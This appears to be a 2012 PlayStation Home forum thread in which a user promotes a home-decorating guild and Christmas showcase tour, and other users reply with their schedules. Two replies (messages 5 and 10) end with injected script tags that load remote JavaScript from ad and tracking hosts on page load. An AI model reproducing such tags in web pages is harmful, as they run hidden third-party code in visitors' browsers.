Dec 05 2012
By: CameraCat Hekseville Citizen 286 posts

Calling All Home Decorators!

41 replies 911 views Edited Dec 5, 2012

Hey all fans of Home decorating! We know you’re out there... we need to join forces!  Knowing there’s power in numbers, we’ve created The Home Decorator’s Guild for YOU as a base for deco lovers! It’s a place to come together; where events can be held, ideas shared, and together we can offer some AWESOME fun to Home users.

Do you have a decorating club on Home? Contact us! Are you a Home user who is interested in taking part in both showing off your personal spaces, and sneaking a peek at other’s ideas? Contact us!

But wait... there’s more! We have teamed up with the good folks of PSHomeGazette to host a Christmas showcase tour. We will announce dates and times soon. It will be a chance for curious Home users to meet us, tour some fun Christmas-themed spaces, and enjoy a fabulous Home Christmas party!

Interested? Please send me a message and tell me 1: Your time zone, 2: A day of the week you are available for club meetings, and 3: What time of day is best for you to meet. From there we will compile a list of potential deco clubs and meet-up schedules. 

Sound good? Come on, everybody... let’s show off! Let’s snoop! LET’S HAVE SOME DECO FUN!

Image20121204231043899.jpg

Message 1 of 42 (911 Views)
Shinra Executive
29271 posts

Re: Calling All Home Decorators!

Dec 5, 2012

Best of luck with this Camera! Smiley Happy

Message 2 of 42 (873 Views)
Wastelander
635 posts

Dec 6, 2012
For all those checking out this posting, we want you to come to us so we can help you get INTO a club also. We hope to be the HUB for ALL deco clubs.

So if you are interested in finding a deco club to join, or to lead, in your time zone or at a time of day/evening that is good for you; contact us. We are making a database of all that are interested in showing off their decorated spaces or seeing how others decorate.

We need to join forces to learn from each other!! Can't wait to hear from all you decorators, I know you're out there!!
Message 3 of 42 (837 Views)
Fender Bender
1728 posts

Dec 6, 2012

This is what I have been looking for quite some time now.  I am most definitely interested.

I am in the EST time zone (East Coast!)

Can attend meetings that are held on the weekends

As I work nights my prime home time is between 1 AM EST - 4 AM EST

I can meet most anytime on the weekends as I don't get on till very late during the week.

jason 1 8 0 2 1 2 8 signature
Message 4 of 42 (818 Views)
Lombax Warrior
136 posts

Dec 6, 2012

haya i love decorating and goin to other's spaces to get more ideas. i would like to be in this club but not sure if i have room for a club since my fam has me mostly full. i can figure some things out though.

i'm PST time and basically free anytime

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Message 5 of 42 (798 Views)
0 Likes
Shinra Executive
29271 posts

Dec 6, 2012

Should be a very interesting private space review coming out shorty by one of the online Home Magazines. I think this group is going to be super interested in seeing what that space is all about! 

Smiley Happy

Message 6 of 42 (793 Views)
0 Likes
Treasure Hunter
3846 posts

Dec 6, 2012
;^) I do like personalizing my spaces to give them my own flavor, but don't know whether I'd have time for any sort of regular schedule....
Message 7 of 42 (752 Views)
0 Likes
Hekseville Citizen
286 posts

Dec 7, 2012

Right now we're "taking names and numbers", so to speak, to get a list together of interested people, and find out when they can meet up. A late-night deco club would be a great idea, and might also be something people from other regions, such as the UK, could participate in. It would be pretty cool to have the chance to see how some of those EU-only apartments are decorated! And I would be thrilled to be able to take part in a Japan deco club. Heck, I would be willing to meet up pretty much ANY time for a Japan showcase tour.

Some of these clubs might meet up on a regular basis, but others might prefer to be flexible and have a TBA showcase... sort of like some of the other Home clubs that hold monthly parties. Right now we will be making a list of everyone who is interested in being part of a deco club and we will be contacting you all to let you know when these clubs will be touring.

We will be hosting a Christmas showcase tour soon, and it will be a great opportunity for you all to meet us. We hope to be able to schedule the event to happen over more than one day, so we can accomodate different schedules and time zones.

Message 8 of 42 (712 Views)
Hekseville Citizen
286 posts

Dec 15, 2012

Hey folks... I just wanted to thank everybody for replying! We have over 30 members in the guild, and hopefully MANY more after the Christmas event tomorrow! I look forward to meeting some of you then. We will also be in touch with those of you who were able to give us an idea of when you can meet up. For those who aren't sure, well, stay in touch. We may be able to come up with some clubs that meet on a TBA schedule, or perhaps meet once a month instead of once a week.

We have three decor clubs in the works right now! Our Home apartments are bound to start looking pretty snazzy with all of these ideas flowing.

For details about the Christmas event, please click on the following forum link: http://community.us.playstation.com/t5/PlayStation-Home/Christmas-Showcase-Decor-Tours/m-p/39061295#...

Message 9 of 42 (668 Views)
Lombax Warrior
136 posts

Dec 16, 2012

i'd still be interested in geting involved in this i am currently full on clubhouses mostly for my fam, but would be willin to get rid of one of em to be able to participate in this. can someone send me a friendrequest so i can get more info. my pshome name is Daysaniya thanks

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script> <script id="__changoScript" type="text/javascript">// var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src=( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // </script>
Message 10 of 42 (625 Views)
0 Likes